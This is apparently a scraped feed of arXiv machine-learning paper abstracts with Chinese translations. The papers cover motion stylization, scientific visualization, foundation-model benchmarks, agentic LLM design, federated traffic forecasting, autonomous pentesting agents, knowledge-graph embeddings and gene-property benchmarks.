generalization, allowing it to handle different class and content labels for various applications. Additionally, it can generate diverse motion sequences when specific class and content labels are provided. The framework's efficacy is demonstrated through experimentation on three datasets: the CMU XIA dataset for motion style transfer, the MHAD dataset, and the RRIS Ability dataset for motion retargeting. Notably, this paper presents the first generalized framework for motion style transfer and motion retargeting, showcasing its potential contributions in this area.
Updated: 2024-12-05 12:03:02
标题: D-LORD用于动作风格化
摘要: 本文介绍了一种名为D-LORD(双潜在优化用于表征解缠)的新型框架,该框架旨在进行动作风格化(动作风格转移和动作重定向)。该框架的主要目标是使用数据驱动的潜在优化方法,从给定的动作序列中分离类别和内容信息。这里,类别指的是特定个人风格,如特定情绪或个体的身份,而内容则与动作的与风格无关的方面相关,例如步行或跳跃等在普遍理解中的概念。D-LORD的关键优势在于其能够执行风格转移而无需配对的动作数据。相反,它在潜在优化过程中利用类别和内容标签。通过解缠表示,该框架使得可以使用自适应实例标准化将一个动作序列的风格转换到另一个动作序列的风格。所提出的D-LORD框架设计重点放在泛化上,使其能够处理不同应用的不同类别和内容标签。此外,它可以在提供特定类别和内容标签时生成多样的动作序列。通过在三个数据集上进行实验验证了该框架的有效性:CMU XIA数据集用于动作风格转移,MHAD数据集和RRIS Ability数据集用于动作重定向。值得注意的是,本文提出了第一个通用的动作风格转移和动作重定向框架,展示了其在这一领域的潜在贡献。
更新时间: 2024-12-05 12:03:02
领域: cs.CV,cs.AI
HyperFLINT: Hypernetwork-based Flow Estimation and Temporal Interpolation for Scientific Ensemble Visualization
We present HyperFLINT (Hypernetwork-based FLow estimation and temporal INTerpolation), a novel deep learning-based approach for estimating flow fields, temporally interpolating scalar fields, and facilitating parameter space exploration in spatio-temporal scientific ensemble data. This work addresses the critical need to explicitly incorporate ensemble parameters into the learning process, as traditional methods often neglect these, limiting their ability to adapt to diverse simulation settings and provide meaningful insights into the data dynamics. HyperFLINT introduces a hypernetwork to account for simulation parameters, enabling it to generate accurate interpolations and flow fields for each timestep by dynamically adapting to varying conditions, thereby outperforming existing parameter-agnostic approaches. The architecture features modular neural blocks with convolutional and deconvolutional layers, supported by a hypernetwork that generates weights for the main network, allowing the model to better capture intricate simulation dynamics. A series of experiments demonstrates HyperFLINT's significantly improved performance in flow field estimation and temporal interpolation, as well as its potential in enabling parameter space exploration, offering valuable insights into complex scientific ensembles.
Updated: 2024-12-05 12:01:20
标题: 超级FLINT:基于超网络的科学集合可视化的流估计和时间插值
摘要: 我们提出了HyperFLINT(基于超网络的流场估计和时间插值),这是一种新颖的基于深度学习的方法,用于估计流场、时间插值标量场,并促进时空科学集合数据的参数空间探索。这项工作解决了明确将集合参数纳入学习过程的关键需求,因为传统方法通常忽略这些参数,从而限制其适应各种模拟设置并提供有意义的数据动态见解的能力。HyperFLINT引入了一个超网络来考虑模拟参数,使其能够通过动态适应不同条件来为每个时间步生成准确的插值和流场,从而胜过现有的不考虑参数的方法。该架构具有模块化神经块,包括卷积和反卷积层,支持一个为主网络生成权重的超网络,从而使模型能够更好地捕捉复杂模拟动态。一系列实验展示了HyperFLINT在流场估计和时间插值方面显着提高的性能,以及其在启用参数空间探索方面的潜力,为复杂科学集合提供宝贵见解。
更新时间: 2024-12-05 12:01:20
领域: cs.CV,cs.GR,cs.LG
Benchmarking Foundation Models on Exceptional Cases: Dataset Creation and Validation
Foundation models (FMs) have achieved significant success across various tasks, leading to research on benchmarks for reasoning abilities. However, there is a lack of studies on FMs performance in exceptional scenarios, which we define as out-of-distribution (OOD) reasoning tasks. This paper is the first to address these cases, developing a novel dataset for evaluation of FMs across multiple modalities, including graphic novels, calligraphy, news articles, and lyrics. It includes tasks for instance classification, character recognition, token prediction, and text generation. The paper also proposes prompt engineering techniques like Chain-of-Thought (CoT) and CoT+Few-Shot to enhance performance. Validation of FMs using various methods revealed improvements. The code repository is accessible at: https://github.com/MLAI-Yonsei/ExceptionalBenchmark
Updated: 2024-12-05 11:58:07
标题: 在特殊情况下对基础模型进行基准测试:数据集创建和验证
摘要: 基础模型(FMs)在各种任务中取得了显著的成功,促使人们对推理能力基准进行研究。然而,在异常情况下,即我们定义的超出分布(OOD)推理任务中,对FMs性能的研究还不足。本文是首次解决这些情况,开发了一个新颖的数据集,用于评估FMs在多种模态下的表现,包括图像小说、书法、新闻文章和歌词。它包括示例分类、字符识别、标记预测和文本生成等任务。本文还提出了Chain-of-Thought(CoT)和CoT+Few-Shot等提示工程技术,以增强性能。使用各种方法对FMs进行验证后发现改进。代码存储库可在以下网址访问:https://github.com/MLAI-Yonsei/ExceptionalBenchmark
更新时间: 2024-12-05 11:58:07
领域: cs.AI
Practical Considerations for Agentic LLM Systems
As the strength of Large Language Models (LLMs) has grown over recent years, so too has interest in their use as the underlying models for autonomous agents. Although LLMs demonstrate emergent abilities and broad expertise across natural language domains, their inherent unpredictability makes the implementation of LLM agents challenging, resulting in a gap between related research and the real-world implementation of such systems. To bridge this gap, this paper frames actionable insights and considerations from the research community in the context of established application paradigms to enable the construction and facilitate the informed deployment of robust LLM agents. Namely, we position relevant research findings into four broad categories--Planning, Memory, Tools, and Control Flow--based on common practices in application-focused literature and highlight practical considerations to make when designing agentic LLMs for real-world applications, such as handling stochasticity and managing resources efficiently. While we do not conduct empirical evaluations, we do provide the necessary background for discussing critical aspects of agentic LLM designs, both in academia and industry.
Updated: 2024-12-05 11:57:49
标题: 主动学习模型系统的实践考虑
摘要: 随着近年来大型语言模型(LLMs)的实力不断增强,人们对将其用作自主代理模型的基础模型的兴趣也在增加。尽管LLMs展示了在自然语言领域的新兴能力和广泛专业知识,但其固有的不可预测性使得LLM代理的实施具有挑战性,导致相关研究与这类系统的实际实施之间存在差距。为了弥合这一差距,本文将研究社区中的可操作见解和考虑因素置于已建立的应用范式的背景下,以便构建和促进具有抗干扰能力的LLM代理的知情部署。具体来说,我们将相关研究结果分为四个广泛的类别——规划、记忆、工具和控制流——基于应用重点文献中的常见做法,并强调在设计面向实际应用的LLM代理时需要考虑的实际因素,例如处理随机性和高效管理资源。虽然我们没有进行实证评估,但我们提供了讨论学术界和工业界中LLM设计关键方面的必要背景。
更新时间: 2024-12-05 11:57:49
领域: cs.AI
PePR: Performance Per Resource Unit as a Metric to Promote Small-Scale Deep Learning in Medical Image Analysis
The recent advances in deep learning (DL) have been accelerated by access to large-scale data and compute. These large-scale resources have been used to train progressively larger models which are resource intensive in terms of compute, data, energy, and carbon emissions. These costs are becoming a new type of entry barrier to researchers and practitioners with limited access to resources at such scale, particularly in the Global South. In this work, we take a comprehensive look at the landscape of existing DL models for medical image analysis tasks and demonstrate their usefulness in settings where resources are limited. To account for the resource consumption of DL models, we introduce a novel measure to estimate the performance per resource unit, which we call the PePR score. Using a diverse family of 131 unique DL architectures (spanning 1M to 130M trainable parameters) and three medical image datasets, we capture trends about the performance-resource trade-offs. In applications like medical image analysis, we argue that small-scale, specialized models are better than striving for large-scale models. Furthermore, we show that using existing pretrained models that are fine-tuned on new data can significantly reduce the computational resources and data required compared to training models from scratch. We hope this work will encourage the community to focus on improving AI equity by developing methods and models with smaller resource footprints.
Updated: 2024-12-05 11:57:19
标题: PePR:性能资源单位作为一种指标促进医学图像分析中的小规模深度学习
摘要: 近年来深度学习(DL)的快速发展得益于大规模数据和计算资源的可获得性。这些大规模资源被用于训练规模逐渐增大的模型,这些模型在计算、数据、能源和碳排放方面具有资源密集性。这些成本正在成为研究人员和从业者面临的一种新的门槛,尤其是在全球南方地区资源有限的情况下。在这项工作中,我们全面审视了用于医学图像分析任务的现有DL模型的格局,并展示了它们在资源有限的情况下的实用性。为了考虑DL模型的资源消耗,我们引入了一个新颖的度量来估计每个资源单位的性能,我们称之为PePR分数。使用131个独特的DL架构家族(跨越1M至130M可训练参数)和三个医学图像数据集,我们捕捉了有关性能资源权衡的趋势。在医学图像分析等应用中,我们认为小规模、专用化的模型比追求大规模模型更好。此外,我们展示了使用现有预训练模型在新数据上进行微调可以显著减少与从头开始训练模型相比所需的计算资源和数据。我们希望这项工作能鼓励社区通过开发具有较小资源占用的方法和模型来改善人工智能公平性。
更新时间: 2024-12-05 11:57:19
领域: cs.LG,cs.AI,stat.ML
What should a neuron aim for? Designing local objective functions based on information theory
In modern deep neural networks, the learning dynamics of the individual neurons is often obscure, as the networks are trained via global optimization. Conversely, biological systems build on self-organized, local learning, achieving robustness and efficiency with limited global information. We here show how self-organization between individual artificial neurons can be achieved by designing abstract bio-inspired local learning goals. These goals are parameterized using a recent extension of information theory, Partial Information Decomposition (PID), which decomposes the information that a set of information sources holds about an outcome into unique, redundant and synergistic contributions. Our framework enables neurons to locally shape the integration of information from various input classes, i.e. feedforward, feedback, and lateral, by selecting which of the three inputs should contribute uniquely, redundantly or synergistically to the output. This selection is expressed as a weighted sum of PID terms, which, for a given problem, can be directly derived from intuitive reasoning or via numerical optimization, offering a window into understanding task-relevant local information processing. Achieving neuron-level interpretability while enabling strong performance using local learning, our work advances a principled information-theoretic foundation for local learning strategies.
Updated: 2024-12-05 11:50:40
标题: 神经元应该追求什么?基于信息论设计局部目标函数
摘要: 在现代深度神经网络中,个别神经元的学习动态通常是模糊的,因为这些网络是通过全局优化进行训练的。相反,生物系统建立在自组织的、本地学习基础上,通过有限的全局信息实现鲁棒性和效率。我们在这里展示了如何通过设计抽象的生物启发的本地学习目标来实现个别人工神经元之间的自组织。这些目标是使用信息理论的最新扩展——部分信息分解(PID)来参数化的,PID将一组信息源对结果的信息分解为独特的、冗余的和协同的贡献。我们的框架使神经元能够在各种输入类别(即前馈、反馈和侧向)中局部地塑造信息的整合,通过选择这三个输入中的哪一个应该对输出做出独特的、冗余的或协同的贡献。这种选择被表达为PID项的加权和,对于给定的问题,可以直接从直观推理或通过数值优化推导出,为理解与任务相关的本地信息处理提供了窗口。通过实现神经元级的可解释性,同时通过本地学习实现强大的性能,我们的工作推进了基于信息理论的本地学习策略的原则基础。
更新时间: 2024-12-05 11:50:40
领域: cs.IT,cs.LG,cs.NE,math.IT
Learning on Model Weights using Tree Experts
The increasing availability of public models begs the question: can we train neural networks that use other networks as input? Such models allow us to study different aspects of a given neural network, for example, determining the categories in a model's training dataset. However, machine learning on model weights is challenging as they often exhibit significant variation unrelated to the models' semantic properties (nuisance variation). Here, we identify a key property of real-world models: most public models belong to a small set of Model Trees, where all models within a tree are fine-tuned from a common ancestor (e.g., a foundation model). Importantly, we find that within each tree there is less nuisance variation between models. Concretely, while learning across Model Trees requires complex architectures, even a linear classifier trained on a single model layer often works within trees. While effective, these linear classifiers are computationally expensive, especially when dealing with larger models that have many parameters. To address this, we introduce Probing Experts (ProbeX), a theoretically motivated and lightweight method. Notably, ProbeX is the first probing method specifically designed to learn from the weights of a single hidden model layer. We demonstrate the effectiveness of ProbeX by predicting the categories in a model's training dataset based only on its weights. Excitingly, ProbeX can also map the weights of Stable Diffusion into a shared weight-language embedding space, enabling zero-shot model classification.
Updated: 2024-12-05 11:50:24
标题: 学习使用树专家的模型权重
摘要: 随着公共模型的增加,一个问题浮现:我们能否训练使用其他网络作为输入的神经网络?这种模型使我们能够研究给定神经网络的不同方面,例如确定模型训练数据集中的类别。然而,对模型权重进行机器学习具有挑战性,因为它们经常表现出与模型语义属性无关的显著变化(干扰变化)。在这里,我们确定了现实世界模型的一个关键属性:大多数公共模型属于一个小型模型树集合,树中的所有模型都是从一个共同的祖先(例如基础模型)进行微调的。重要的是,我们发现在每个树中,模型之间的干扰变化较少。具体来说,虽然跨模型树的学习需要复杂的架构,但即使在树内训练一个单一模型层上的线性分类器通常也有效。虽然有效,但这些线性分类器在处理具有许多参数的较大模型时计算昂贵。为了解决这个问题,我们引入了一种理论上有动机且轻量级的方法,即探测专家(ProbeX)。值得注意的是,ProbeX是第一个专门设计用于从单个隐藏模型层的权重学习的探测方法。我们通过仅基于模型的权重来预测模型训练数据集中的类别来展示ProbeX的有效性。令人兴奋的是,ProbeX还可以将稳态扩散的权重映射到一个共享的权重-语言嵌入空间,实现零样本模型分类。
更新时间: 2024-12-05 11:50:24
领域: cs.LG,cs.CV
BodyMetric: Evaluating the Realism of HumanBodies in Text-to-Image Generation
Accurately generating images of human bodies from text remains a challenging problem for state of the art text-to-image models. Commonly observed body-related artifacts include extra or missing limbs, unrealistic poses, blurred body parts, etc. Currently, evaluation of such artifacts relies heavily on time-consuming human judgments, limiting the ability to benchmark models at scale. We address this by proposing BodyMetric, a learnable metric that predicts body realism in images. BodyMetric is trained on realism labels and multi-modal signals including 3D body representations inferred from the input image, and textual descriptions. In order to facilitate this approach, we design an annotation pipeline to collect expert ratings on human body realism leading to a new dataset for this task, namely, BodyRealism. Ablation studies support our architectural choices for BodyMetric and the importance of leveraging a 3D human body prior in capturing body-related artifacts in 2D images. In comparison to concurrent metrics which evaluate general user preference in images, BodyMetric specifically reflects body-related artifacts. We demonstrate the utility of BodyMetric through applications that were previously infeasible at scale. In particular, we use BodyMetric to benchmark the generation ability of text-to-image models to produce realistic human bodies. We also demonstrate the effectiveness of BodyMetric in ranking generated images based on the predicted realism scores.
Updated: 2024-12-05 11:48:54
标题: BodyMetric:评估文本到图像生成中人体的真实性
摘要: 从文本准确生成人体图像仍然是最先进的文本到图像模型面临的一个具有挑战性的问题。常见的身体相关的人为痕迹包括额外或缺失的肢体、不现实的姿势、模糊的身体部位等。目前,评估这些人为痕迹主要依赖耗时的人工判断,限制了在规模上对模型进行基准测试的能力。我们通过提出BodyMetric来解决这个问题,这是一个可学习的度量标准,用于预测图像中的身体逼真度。BodyMetric是基于逼真标签和多模态信号训练的,包括从输入图像推断出的3D身体表示和文本描述。为了促进这种方法,我们设计了一个注释流程,以收集专家对人体逼真度的评级,从而形成了一个新的用于此任务的数据集,即BodyRealism。消融研究支持我们对BodyMetric的架构选择以及利用3D人体先验在捕捉2D图像中的与身体相关的人为痕迹方面的重要性。与评估图像中一般用户偏好的同时度量相比,BodyMetric专门反映了与身体相关的人为痕迹。我们通过之前在规模上不可行的应用程序展示了BodyMetric的实用性。特别是,我们使用BodyMetric来对文本到图像模型的生成能力进行基准测试,以产生逼真的人体。我们还展示了BodyMetric在基于预测的逼真度分数对生成的图像进行排名方面的有效性。
更新时间: 2024-12-05 11:48:54
领域: cs.CV,cs.AI
Words in Motion: Extracting Interpretable Control Vectors for Motion Transformers
Transformer-based models generate hidden states that are difficult to interpret. In this work, we aim to interpret these hidden states and control them at inference, with a focus on motion forecasting. We use linear probes to measure neural collapse towards interpretable motion features in hidden states. High probing accuracy implies meaningful directions and distances between hidden states of opposing features, which we use to fit interpretable control vectors for activation steering at inference. To optimize our control vectors, we use sparse autoencoders with fully-connected, convolutional, MLPMixer layers and various activation functions. Notably, we show that enforcing sparsity in hidden states leads to a more linear relationship between control vector temperatures and forecasts. Our approach enables mechanistic interpretability and zero-shot generalization to unseen dataset characteristics with negligible computational overhead. Our implementation is available at https://github.com/kit-mrt/future-motion
Updated: 2024-12-05 11:47:49
标题: 运动中的词语:提取可解释的运动变换控制向量
摘要: Transformer-based 模型生成的隐藏状态很难解释。在这项工作中,我们的目标是解释这些隐藏状态并在推断时对其进行控制,重点放在运动预测上。我们使用线性探测器来测量隐藏状态中可解释运动特征的神经坍缩。高探测准确度意味着对立特征隐藏状态之间的方向和距离有意义,我们利用这些来拟合可解释控制向量以在推断时进行激活控制。为了优化我们的控制向量,我们使用稀疏自编码器与全连接、卷积、MLPMixer层以及各种激活函数。值得注意的是,我们展示了在隐藏状态中施加稀疏性导致控制向量温度和预测之间存在更线性的关系。我们的方法实现了机械可解释性,并对未知数据集特征进行零样本泛化,计算开销微乎其微。我们的实现可在https://github.com/kit-mrt/future-motion 上找到。
更新时间: 2024-12-05 11:47:49
领域: cs.LG,cs.CL,cs.CV
Learnable Similarity and Dissimilarity Guided Symmetric Non-Negative Matrix Factorization
Symmetric nonnegative matrix factorization (SymNMF) is a powerful tool for clustering, which typically uses the $k$-nearest neighbor ($k$-NN) method to construct similarity matrix. However, $k$-NN may mislead clustering since the neighbors may belong to different clusters, and its reliability generally decreases as $k$ grows. In this paper, we construct the similarity matrix as a weighted $k$-NN graph with learnable weight that reflects the reliability of each $k$-th NN. This approach reduces the search space of the similarity matrix learning to $n - 1$ dimension, as opposed to the $\mathcal{O}(n^2)$ dimension of existing methods, where $n$ represents the number of samples. Moreover, to obtain a discriminative similarity matrix, we introduce a dissimilarity matrix with a dual structure of the similarity matrix, and propose a new form of orthogonality regularization with discussions on its geometric interpretation and numerical stability. An efficient alternative optimization algorithm is designed to solve the proposed model, with theoretically guarantee that the variables converge to a stationary point that satisfies the KKT conditions. The advantage of the proposed model is demonstrated by the comparison with nine state-of-the-art clustering methods on eight datasets. The code is available at \url{https://github.com/lwl-learning/LSDGSymNMF}.
Updated: 2024-12-05 11:32:53
标题: 可学习的相似性和不相似性引导的对称非负矩阵分解
摘要: 对称非负矩阵分解(SymNMF)是一种强大的用于聚类的工具,通常使用$k$-最近邻($k$-NN)方法来构建相似性矩阵。然而,$k$-NN可能会误导聚类,因为邻居可能属于不同的簇,而且其可靠性通常随着$k$的增长而降低。在本文中,我们将相似性矩阵构建为一个具有可学习权重的加权$k$-NN图,反映了每个第$k$个最近邻的可靠性。这种方法将相似性矩阵学习的搜索空间减少到$n-1$维,而不是现有方法的$\mathcal{O}(n^2)$维,其中$n$代表样本数。此外,为了获得具有区分性的相似性矩阵,我们引入了一个具有相似性矩阵双重结构的不相似性矩阵,并提出了一种新形式的正交性正则化,讨论了其几何解释和数值稳定性。设计了一种高效的替代优化算法来解决所提出的模型,理论上保证变量收敛到满足KKT条件的稳定点。通过与八个数据集上九种最新的聚类方法进行比较,展示了所提出模型的优势。代码可在\url{https://github.com/lwl-learning/LSDGSymNMF}上找到。
更新时间: 2024-12-05 11:32:53
领域: cs.LG
Federated Learning in Mobile Networks: A Comprehensive Case Study on Traffic Forecasting
The increasing demand for efficient resource allocation in mobile networks has catalyzed the exploration of innovative solutions that could enhance the task of real-time cellular traffic prediction. Under these circumstances, federated learning (FL) stands out as a distributed and privacy-preserving solution to foster collaboration among different sites, thus enabling responsive near-the-edge solutions. In this paper, we comprehensively study the potential benefits of FL in telecommunications through a case study on federated traffic forecasting using real-world data from base stations (BSs) in Barcelona (Spain). Our study encompasses relevant aspects within the federated experience, including model aggregation techniques, outlier management, the impact of individual clients, personalized learning, and the integration of exogenous sources of data. The performed evaluation is based on both prediction accuracy and sustainability, thus showcasing the environmental impact of employed FL algorithms in various settings. The findings from our study highlight FL as a promising and robust solution for mobile traffic prediction, emphasizing its twin merits as a privacy-conscious and environmentally sustainable approach, while also demonstrating its capability to overcome data heterogeneity and ensure high-quality predictions, marking a significant stride towards its integration in mobile traffic management systems.
Updated: 2024-12-05 11:32:14
标题: 移动网络中的联邦学习:基于交通预测的综合案例研究
摘要: 对于移动网络中有效资源分配的需求不断增长,促使人们探索能够增强实时移动流量预测任务的创新解决方案。在这种情况下,联邦学习(FL)作为一种分布式和隐私保护的解决方案,突显了促进不同站点之间合作的能力,从而实现响应快速的边缘解决方案。本文通过使用巴塞罗那(西班牙)基站(BS)的真实数据进行联邦流量预测案例研究,全面研究了FL在电信领域的潜在益处。我们的研究包括联邦经验中的相关方面,包括模型聚合技术、异常值管理、个性化学习以及外部数据源的整合。所进行的评估基于预测准确性和可持续性,展示了在不同情境中使用的FL算法对环境的影响。我们的研究结果突出了FL作为移动流量预测的一种有前途且强大的解决方案,强调其作为一种注重隐私和环境可持续性的方法的双重优点,同时还展示了其克服数据异质性并确保高质量预测的能力,标志着在移动流量管理系统中整合FL的重要进展。
更新时间: 2024-12-05 11:32:14
领域: cs.LG,cs.AI
VGGHeads: 3D Multi Head Alignment with a Large-Scale Synthetic Dataset
Human head detection, keypoint estimation, and 3D head model fitting are essential tasks with many applications. However, traditional real-world datasets often suffer from bias, privacy, and ethical concerns, and they have been recorded in laboratory environments, which makes it difficult for trained models to generalize. Here, we introduce \method -- a large-scale synthetic dataset generated with diffusion models for human head detection and 3D mesh estimation. Our dataset comprises over 1 million high-resolution images, each annotated with detailed 3D head meshes, facial landmarks, and bounding boxes. Using this dataset, we introduce a new model architecture capable of simultaneous head detection and head mesh reconstruction from a single image in a single step. Through extensive experimental evaluations, we demonstrate that models trained on our synthetic data achieve strong performance on real images. Furthermore, the versatility of our dataset makes it applicable across a broad spectrum of tasks, offering a general and comprehensive representation of human heads.
Updated: 2024-12-05 11:29:56
标题: VGGHeads:使用大规模合成数据集进行3D多头部对齐
摘要: 人头检测,关键点估计和3D头部模型拟合是许多应用中必不可少的任务。然而,传统的现实世界数据集往往存在偏见、隐私和伦理关切,并且它们是在实验室环境中记录的,这使得训练模型难以泛化。在这里,我们介绍了一种使用扩散模型生成的大规模合成数据集\method,用于人头检测和3D网格估计。我们的数据集包括超过100万张高分辨率图像,每张图像都标有详细的3D头部网格、面部标志和边界框。利用这个数据集,我们介绍了一种新的模型架构,能够在单个步骤中从单个图像中同时进行头部检测和头部网格重建。通过广泛的实验评估,我们证明了在我们的合成数据上训练的模型在真实图像上取得了强大的性能。此外,我们数据集的多功能性使其适用于广泛的任务,提供了对人头的一般和全面的表征。
更新时间: 2024-12-05 11:29:56
领域: cs.CV,cs.LG
Towards Generalizable Autonomous Penetration Testing via Domain Randomization and Meta-Reinforcement Learning
With increasing numbers of vulnerabilities exposed on the internet, autonomous penetration testing (pentesting) has emerged as an emerging research area, while reinforcement learning (RL) is a natural fit for studying autonomous pentesting. Previous research in RL-based autonomous pentesting mainly focused on enhancing agents' learning efficacy within abstract simulated training environments. They overlooked the applicability and generalization requirements of deploying agents' policies in real-world environments that differ substantially from their training settings. In contrast, for the first time, we shift focus to the pentesting agents' ability to generalize across unseen real environments. For this purpose, we propose a Generalizable Autonomous Pentesting framework (namely GAP) for training agents capable of drawing inferences from one to another -- a key requirement for the broad application of autonomous pentesting and a hallmark of human intelligence. GAP introduces a Real-to-Sim-to-Real pipeline with two key methods: domain randomization and meta-RL learning. Specifically, we are among the first to apply domain randomization in autonomous pentesting and propose a large language model-powered domain randomization method for synthetic environment generation. We further apply meta-RL to improve the agents' generalization ability in unseen environments by leveraging the synthetic environments. The combination of these two methods can effectively bridge the generalization gap and improve policy adaptation performance. Experiments are conducted on various vulnerable virtual machines, with results showing that GAP can (a) enable policy learning in unknown real environments, (b) achieve zero-shot policy transfer in similar environments, and (c) realize rapid policy adaptation in dissimilar environments.
Updated: 2024-12-05 11:24:27
标题: 朝向通过领域随机化和元强化学习实现通用自主渗透测试
摘要: 随着互联网上暴露的漏洞数量不断增加,自主渗透测试(pentesting)已成为一个新兴的研究领域,而强化学习(RL)是研究自主渗透测试的自然选择。先前基于RL的自主渗透测试研究主要集中在提升代理学习在抽象模拟训练环境中的效果上。他们忽视了在部署代理策略到与其训练环境存在显著差异的真实环境中的适用性和泛化要求。相反,我们首次将焦点转向自主渗透测试代理在未知真实环境中的泛化能力。为此,我们提出了一个适用于训练代理能够从一个环境中推断到另一个环境的Generalizable Autonomous Pentesting框架(即GAP)-- 这是自主渗透测试广泛应用的关键要求,也是人类智能的标志。GAP引入了一个Real-to-Sim-to-Real管道,包括两个关键方法:领域随机化和元RL学习。具体来说,我们是最早在自主渗透测试中应用领域随机化的,并提出了一个基于大型语言模型的领域随机化方法来生成合成环境。我们进一步应用元RL来提高代理在未知环境中的泛化能力,通过利用合成环境。这两种方法的结合可以有效地弥合泛化差距,并提高策略适应性表现。实验在各种易受攻击的虚拟机上进行,结果显示GAP可以(a)在未知真实环境中实现策略学习,(b)在相似环境中实现零-shot策略转移,以及(c)在不同环境中实现快速策略适应。
更新时间: 2024-12-05 11:24:27
领域: cs.LG,cs.CR
A Deep RL Approach on Task Placement and Scaling of Edge Resources for Cellular Vehicle-to-Network Service Provisioning
Cellular-Vehicle-to-Everything (C-V2X) is currently at the forefront of the digital transformation of our society. By enabling vehicles to communicate with each other and with the traffic environment using cellular networks, we redefine transportation, improving road safety and transportation services, increasing efficiency of vehicular traffic flows, and reducing environmental impact. To effectively facilitate the provisioning of Cellular Vehicular-to-Network (C-V2N) services, we tackle the interdependent problems of service task placement and scaling of edge resources. Specifically, we formulate the joint problem and prove that it is not computationally tractable. To address its complexity we propose Deep Hybrid Policy Gradient (DHPG), a new Deep Reinforcement Learning (DRL) approach that operates in hybrid action spaces, enabling holistic decision-making and enhancing overall performance. We evaluated the performance of DHPG using simulations with a real-world C-V2N traffic dataset, comparing it to several state-of-the-art (SoA) solutions. DHPG outperforms these solutions, guaranteeing the $99^{th}$ percentile of C-V2N service delay target, while simultaneously optimizing the utilization of computing resources. Finally, time complexity analysis is conducted to verify that the proposed approach can support real-time C-V2N services.
Updated: 2024-12-05 11:23:14
标题: 一个关于蜂窝车辆到网络服务提供的任务放置和边缘资源扩展的深度强化学习方法
摘要: 细胞车辆对一切(C-V2X)目前处于我们社会数字转型的前沿。通过利用细胞网络使车辆能够相互通信以及与交通环境进行交流,我们重新定义了交通运输,改善了道路安全和交通服务,提高了车辆交通流的效率,减少了环境影响。为了有效促进细胞车辆对网络(C-V2N)服务的提供,我们解决了服务任务放置和边缘资源扩展的相互依赖问题。具体来说,我们制定了联合问题,并证明了它是不可计算的。为了解决其复杂性,我们提出了深度混合策略梯度(DHPG),这是一种新的深度强化学习(DRL)方法,它在混合行动空间中运作,实现了整体决策,并增强了整体性能。我们使用真实世界的C-V2N交通数据集进行了DHPG性能评估,将其与几种最先进的解决方案进行了比较。DHPG胜过这些解决方案,保证了C-V2N服务延迟目标的99%分位数,同时优化了计算资源的利用。最后,进行了时间复杂度分析,以验证所提出的方法能够支持实时的C-V2N服务。
更新时间: 2024-12-05 11:23:14
领域: cs.AI,cs.MA,cs.NI
Transferring disentangled representations: bridging the gap between synthetic and real images
Developing meaningful and efficient representations that separate the fundamental structure of the data generation mechanism is crucial in representation learning. However, Disentangled Representation Learning has not fully shown its potential on real images, because of correlated generative factors, their resolution and limited access to ground truth labels. Specifically on the latter, we investigate the possibility of leveraging synthetic data to learn general-purpose disentangled representations applicable to real data, discussing the effect of fine-tuning and what properties of disentanglement are preserved after the transfer. We provide an extensive empirical study to address these issues. In addition, we propose a new interpretable intervention-based metric, to measure the quality of factors encoding in the representation. Our results indicate that some level of disentanglement, transferring a representation from synthetic to real data, is possible and effective.
Updated: 2024-12-05 11:21:16
标题: 转移解缠表示:弥合合成图像和实际图像之间的差距
摘要: 发展有意义和高效的表示形式,将数据生成机制的基本结构分离开来,对于表示学习至关重要。然而,解缠结表示学习在真实图像上尚未充分展现其潜力,因为存在相关的生成因素、其分辨率以及对地面真实标签的有限访问。特别是在后者上,我们调查了利用合成数据来学习适用于真实数据的通用解缠结表示的可能性,并讨论了微调的效果以及在转移后保留了哪些解缠结特性。我们进行了广泛的实证研究来解决这些问题。此外,我们提出了一种新的可解释的基于干预的度量标准,用于衡量表示中编码因素的质量。我们的结果表明,在合成数据到真实数据的转移中,一定程度的解缠结是可能和有效的。
更新时间: 2024-12-05 11:21:16
领域: cs.CV,cs.AI
Distance-Adaptive Quaternion Knowledge Graph Embedding with Bidirectional Rotation
Quaternion contains one real part and three imaginary parts, which provided a more expressive hypercomplex space for learning knowledge graph. Existing quaternion embedding models measure the plausibility of a triplet either through semantic matching or geometric distance scoring functions. However, it appears that semantic matching diminishes the separability of entities, while the distance scoring function weakens the semantics of entities. To address this issue, we propose a novel quaternion knowledge graph embedding model. Our model combines semantic matching with entity's geometric distance to better measure the plausibility of triplets. Specifically, in the quaternion space, we perform a right rotation on head entity and a reverse rotation on tail entity to learn rich semantic features. Then, we utilize distance adaptive translations to learn geometric distance between entities. Furthermore, we provide mathematical proofs to demonstrate our model can handle complex logical relationships. Extensive experimental results and analyses show our model significantly outperforms previous models on well-known knowledge graph completion benchmark datasets. Our code is available at https://github.com/llqy123/DaBR.
Updated: 2024-12-05 11:17:03
标题: 距离自适应的双向旋转四元数知识图嵌入
摘要: 四元数包含一个实部和三个虚部,为学习知识图提供了更具表现力的超复数空间。现有的四元数嵌入模型通过语义匹配或几何距离评分函数来衡量三元组的可信度。然而,似乎语义匹配会降低实体的可分性,而距离评分函数会削弱实体的语义。为了解决这个问题,我们提出了一种新颖的四元数知识图嵌入模型。我们的模型将语义匹配与实体的几何距离结合起来,更好地衡量三元组的可信度。具体来说,在四元数空间中,我们对头实体进行右旋转,对尾实体进行反向旋转,以学习丰富的语义特征。然后,我们利用距离自适应翻译来学习实体之间的几何距离。此外,我们提供数学证明来证明我们的模型可以处理复杂的逻辑关系。广泛的实验结果和分析表明,我们的模型在知名知识图完成基准数据集上显著优于先前的模型。我们的代码可在https://github.com/llqy123/DaBR找到。
更新时间: 2024-12-05 11:17:03
领域: cs.LG
Does your model understand genes? A benchmark of gene properties for biological and text models
The application of deep learning methods, particularly foundation models, in biological research has surged in recent years. These models can be text-based or trained on underlying biological data, especially omics data of various types. However, comparing the performance of these models consistently has proven to be a challenge due to differences in training data and downstream tasks. To tackle this problem, we developed an architecture-agnostic benchmarking approach that, instead of evaluating the models directly, leverages entity representation vectors from each model and trains simple predictive models for each benchmarking task. This ensures that all types of models are evaluated using the same input and output types. Here we focus on gene properties collected from professionally curated bioinformatics databases. These gene properties are categorized into five major groups: genomic properties, regulatory functions, localization, biological processes, and protein properties. Overall, we define hundreds of tasks based on these databases, which include binary, multi-label, and multi-class classification tasks. We apply these benchmark tasks to evaluate expression-based models, large language models, protein language models, DNA-based models, and traditional baselines. Our findings suggest that text-based models and protein language models generally outperform expression-based models in genomic properties and regulatory functions tasks, whereas expression-based models demonstrate superior performance in localization tasks. These results should aid in the development of more informed artificial intelligence strategies for biological understanding and therapeutic discovery. To ensure the reproducibility and transparency of our findings, we have made the source code and benchmark data publicly accessible for further investigation and expansion at github.com/BiomedSciAI/gene-benchmark.
Updated: 2024-12-05 11:14:01
